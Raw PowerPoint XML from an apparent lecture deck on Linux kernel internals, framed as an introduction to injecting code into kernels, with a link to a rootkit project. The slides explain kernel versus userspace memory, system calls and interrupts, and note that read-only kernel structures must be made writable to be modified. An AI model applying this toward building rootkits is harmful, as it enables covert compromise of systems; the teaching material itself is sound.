                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>” command you will have seen that there is an ‘R': this means that this address is “read-only”.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Indeed the kernel poses some structures in the “read-only” memory zone: in this way it protects them against intentional or unintentional changes which can lead to system instability. So we have to set this structure in “read/write” mode if we want to modify them.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Fortunately, the kernel provides us with special functions for this task:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{28368311-2531-AC4E-963E-E3FE7A847D4B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12970463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actually</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{28368311-2531-AC4E-963E-E3FE7A847D4B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1139741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8368311-2531-AC4E-963E-E3FE7A847D4B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19281893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is how the different kernel components are interrelated. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{28368311-2531-AC4E-963E-E3FE7A847D4B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19317065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Here’s a more simpler diagram. In essence, the kernel lets </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>userspace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> apps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> execute the way they do. It’s the glue that holds things together</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{28368311-2531-AC4E-963E-E3FE7A847D4B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8303659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modern computer operating system usually segregates virtual memory into kernel space and user space.[a] Primarily, this separation serves to protect data and functionality from faults (by improving fault tolerance) and malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>behaviour</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (by providing computer security).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>[move this later] When</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> we write user code, memory leaks, exceptions, segmentation faults, and general memory issues will typically result in the termination of the running application. However, kernel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>programers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> have to be more careful because </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{28368311-2531-AC4E-963E-E3FE7A847D4B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13303011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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> complete many functional tasks, day-to-day applications need to execute system calls. What a system call does is it invokes the kernel, the kernel reads the input to the system call, it will execute the system call code, and return the output back to the user.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{28368311-2531-AC4E-963E-E3FE7A847D4B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20532324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hardware or the software tells the processor, hey I need attention, look at me!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{28368311-2531-AC4E-963E-E3FE7A847D4B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1726234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Hardware interrupts are used by devices to communicate that they require attention from the operating system.[2] Internally, hardware interrupts are implemented using electronic alerting signals that are sent to the processor from an external device, which is either a part of the computer itself, such as a disk controller, or an external peripheral. hardware interrupts are asynchronous and can occur in the middle of instruction execution, requiring additional care in programming. The act of initiating a hardware interrupt is referred to as an interrupt request (IRQ).</a:t>
            </a:r>
          </a:p>
          <a:p>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 software interrupt is caused either by an exceptional condition in the processor itself, or a special instruction in the instruction set which causes an interrupt when it is executed. The former is often called a trap or exception and is used for errors or events occurring during program execution that are exceptional enough that they cannot be handled within the program itself.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{28368311-2531-AC4E-963E-E3FE7A847D4B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10054188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8ACDB3CC-F982-40F9-8DD6-BCC9AFBF44BD}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>2/28/16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F88E988-FB04-AB4E-BE5A-59F242AF7F7A}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17283514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8C2560D-EC28-3B41-86E8-18F1CE0113B4}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/28/16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37233172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8C2560D-EC28-3B41-86E8-18F1CE0113B4}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/28/16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24179964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8C2560D-EC28-3B41-86E8-18F1CE0113B4}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/28/16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32203822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A9E7B99-7C3F-4BC3-B7B8-7E1F8C620B24}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>2/28/16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1AF2B4D-6B12-4EDF-87BB-2B55CECB6611}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11223948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68C2560D-EC28-3B41-86E8-18F1CE0113B4}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/28/16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12605946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68C2560D-EC28-3B41-86E8-18F1CE0113B4}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/28/16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24868244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8C2560D-EC28-3B41-86E8-18F1CE0113B4}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/28/16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10847129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8C2560D-EC28-3B41-86E8-18F1CE0113B4}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/28/16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12492246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8C2560D-EC28-3B41-86E8-18F1CE0113B4}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/28/16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6B1FF6-39B9-40F5-8B67-33C6354A3D4F}" type="slidenum">
              <a:rPr kumimoji="0" lang="en-US" smtClean="0"/>
              <a:pPr eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="0" lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:shade val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12182203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8C2560D-EC28-3B41-86E8-18F1CE0113B4}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/28/16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3615983108"/>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8C2560D-EC28-3B41-86E8-18F1CE0113B4}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/28/16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066355A-084C-D24E-9AD2-7E4FC41EA627}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3693843513"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMap bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
  <p:sldLayoutIdLst>
    <p:sldLayoutId id="2147493456" r:id="rId1"/>
    <p:sldLayoutId id="2147493457" r:id="rId2"/>
    <p:sldLayoutId id="2147493458" r:id="rId3"/>
    <p:sldLayoutId id="2147493459" r:id="rId4"/>
    <p:sldLayoutId id="2147493460" r:id="rId5"/>
    <p:sldLayoutId id="2147493461" r:id="rId6"/>
    <p:sldLayoutId id="2147493462" r:id="rId7"/>
    <p:sldLayoutId id="2147493463" r:id="rId8"/>
    <p:sldLayoutId id="2147493464" r:id="rId9"/>
    <p:sldLayoutId id="2147493465" r:id="rId10"/>
    <p:sldLayoutId id="2147493466"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7.tif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8.tif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9.tif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lxr.free-electrons.com/source/include/linux/syscalls.h"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tif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tif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tif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comments" Target="../comments/commen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ithub.com/mncoppola/suterusu"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Hey kids:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Do you like injecting code into OS kernels for profit? (Yeah!)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Greg Bekher</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>12 March 2015</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2676737828"/>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Kernel vs. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Userspace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Memory</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect l="12522" r="12522"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4829958" y="1600200"/>
            <a:ext cx="3856842" cy="4479925"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="3956050" cy="4525963"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:normAutofit fontScale="85000" lnSpcReduction="1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err="1" smtClean="0"/>
              <a:t>Userspace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>processes can NOT write to kernel space memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Semi-exception are kernel modules, which are inserted into the kernel and become a part of kernel memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The kernel, however, can write to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>userspace</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="559737662"/>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34"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="277322" y="2206625"/>
            <a:ext cx="4802677" cy="3245052"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Userapp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-Kernel communication</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5079999" y="1600200"/>
            <a:ext cx="3794125" cy="5019675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:normAutofit fontScale="85000" lnSpcReduction="1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smtClean="0"/>
              <a:t>To talk to the kernel, run-of-the-mill </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>userspace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> applications generally use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>glibc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> wrappers to execute system calls.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>System calls operate by invoking the kernel, which will run the system call code, and deliver output to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>userspace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="380521391"/>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OS Elements</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CMSC412 Incoming</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2500421108"/>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3352800" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>System interrupt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="3352800" cy="4927599"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Signal to the processor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Handled by an interrupt handler in the kernel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Two types:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hardware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>int</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Software </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>int</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4124821" y="274638"/>
            <a:ext cx="4885828" cy="6253161"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3771821626"/>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Hardware interrupt vs. Software interrupt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
